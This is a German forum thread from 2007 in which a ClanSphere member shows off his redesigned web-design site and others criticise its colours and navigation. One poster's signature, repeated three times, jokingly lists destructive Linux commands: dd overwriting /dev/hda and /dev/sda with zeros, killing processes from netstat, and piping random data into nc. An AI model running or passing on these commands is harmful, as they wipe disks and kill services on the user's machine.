Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 11
Seite [1]
UnKn0wn ClanSphere Team


Geekboy





Beiträge: 1160
# Thema - 02.05.2007 um 15:05 Uhr
... für alle die meine Webseite kennen hab ich mal wieder ein neues Design gemacht.

Muss ja meinen monatlichen Rhytmus halten. Hätte ja fast nicht geklappt.

Nein, Spass beiseite.

Das Design wurde nochmals überarbeitet und ich habe noch Unterstützung im Bereich Programmierung durch Fr33z3m4n bekommen, einigen Besuchern bereits aus dem Clansphere Team bekannt. Ich freue mich auf die Zusammenarbeit und die zukünftigen Projekte.

Folgende Änderungen wurden vorgenommen:

- Topliste wurde in das Design integriert
- Anpassung einiger Funktionen
- Bugtracker für Templates
- Usergalerie
- Special eingebunden (hierzu später mehr, freut euch schonmal CS Team)

Wir hoffen Euch gefällt der neue Auftritt und wir hoffen auf Eure Beteiligung. Gerne könnt Ihr Eure Webseiten in die Topliste eintragen, würde mich freuen.


------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com
Inaktiv
Denni


Specialist




Herkunft: Ilsfeld
Beiträge: 1972
# Antwort: 1 - 02.05.2007 um 15:06 Uhr
Du bist wirklich unverbesserlich immer neue designs^^

aber spaß beiseite das rot gefällt mir sehr gut!


------------------
Gruß
Denni

ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 2 - 02.05.2007 um 16:44 Uhr
Sry wenn ich dass so sage:

Alter was geht denn jetzt ab?!
Erstmal nervt es echt ein wenig jeden Monat eine neue Seite von dir zu sehen.
Desweiteren gehen die Farben bei dem Rot aber mal echt nicht. Alleine auf dem Enterpic. Das kleine in silber, umrandet mit blau (oO) und einen roten Hintergrund. Davon bekommt man aber mal richtig fies was an den Augen weg..

In der Navigation dieser Türkiese Ton, blau, grün oder was auch immer, zusammen mit einem Hauch an Rosa aus dem Content setzt dem ganzen echt die Krone auf.

Nimm dir echt mal ein wenig mehr Zeit und erstell ein Design welches dann auch mal länger als 4 Wochen online ist.
Es gab schon bessere Sachen von Dir zu sehen.

PS: Will dich damit nicht persönlich angreifen etc. ist nur meine Meinung zu dem Design...


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
UnKn0wn ClanSphere Team
Thread-Ersteller


Geekboy





Beiträge: 1160
# Antwort: 3 - 02.05.2007 um 16:47 Uhr
Kein Problem

Kritik ist immer gut.

Hab die Farben beim content mal angepasst!


------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Zuletzt editiert von Sebel-Design ClanSphere Team am 02.05.2007 um 16:57 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 02.05.2007 um 16:58 Uhr
Ich meine es wirklich nicht böse. Nur wie gesagt es gab schon Seite von dir da musste ich sagen n1. Aber je öffter man eine Seite erneuert bzw wie in deinem Fall komplett durch eine neu Ersetzt, dann fehlt einem die Zeit um entweder auf dem gleichen Level zu bleiben oder aber sihc sogar zu verbessern. Vondaher, nimm die wirklich mal die Zeit und bau etwas, was dann aber auch bleibt =)


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
UnKn0wn ClanSphere Team
Thread-Ersteller


Geekboy





Beiträge: 1160
# Antwort: 5 - 02.05.2007 um 17:00 Uhr
Ist vermerkt

Momentan liegt halt Hauptaugenmerk auf den Aufträgen.



------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Zuletzt editiert von Sebel-Design ClanSphere Team am 02.05.2007 um 17:00 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 6 - 02.05.2007 um 17:01 Uhr
Ist auch richtig so. Wenn es Aufträge gibt, dann ist es bei uns nicht anders. Wenn diese abgearbeitet sind dann kann man an den eigenen Sachen weitermachen. Aber wie gesagt, dass erste was ein "potenzieller Kunde" sieht, ist die eigene Homepage, in diesem Fall deine. Von daher


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
UnKn0wn ClanSphere Team
Thread-Ersteller


Geekboy





Beiträge: 1160
# Antwort: 7 - 02.05.2007 um 17:07 Uhr
Erkunde gerade die xbox Clanseiten dieser Welt als potentielle Auftraggeber.

Da ist ein riesiger Markt der bedient werden möchte.

Irgendwann wird es bestimmt ein Design geben das ewig hält.

Aber mehr Feedback gerne erwünscht.


------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 8 - 02.05.2007 um 17:13 Uhr
kann phaeno nur recht geben. sry aber an der page hier gefällt mir grade wirklich gar nichts.

wenn du so viele aufträge hast dann mach dir doch selbst einfach n kleines designchen und fertig.
sollte n bischen edel und prfessionell aussehen und das hält dann auch n jahr oder so dann hast du zeit für deine kunden, aber versuch doch net trotz zeitmangel deine Designs wöchentlich zu erneuern
das blaue was du hiervor hattest gefiel mir recht gut, lass das doch einfach.


------------------
www.laszlokorte.de

Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 9 - 02.05.2007 um 17:30 Uhr
viel zu einfarbig, vor allem in der navi, hätte der auch noch nen hübschen rollover verpasst.


Inaktiv
|
UnKn0wn ClanSphere Team
Thread-Ersteller


Geekboy





Beiträge: 1160
# Antwort: 10 - 02.05.2007 um 17:55 Uhr
Wäre auch ne Massnahme ist ja schnell gemacht, danke für den Tip!


------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Inaktiv
|
herrherrmann


Rock the board




Herkunft: Berlin
Beiträge: 84
# Antwort: 11 - 02.05.2007 um 20:17 Uhr
Ich finde es bis auf den Navbody ganz gut.
Die rechten Enden sind nicht gerade ansehnlich und am Ende der Navis könnte man auch noch was schickes einbauen bzw. abstufen.

Ansonsten finde ich das Design nicht oberklasse, aber auch nicht so schlecht.


------------------
bastArt

Inaktiv
|
Antworten: 11
Seite [1]


Sie müssen sich registrieren, um zu antworten.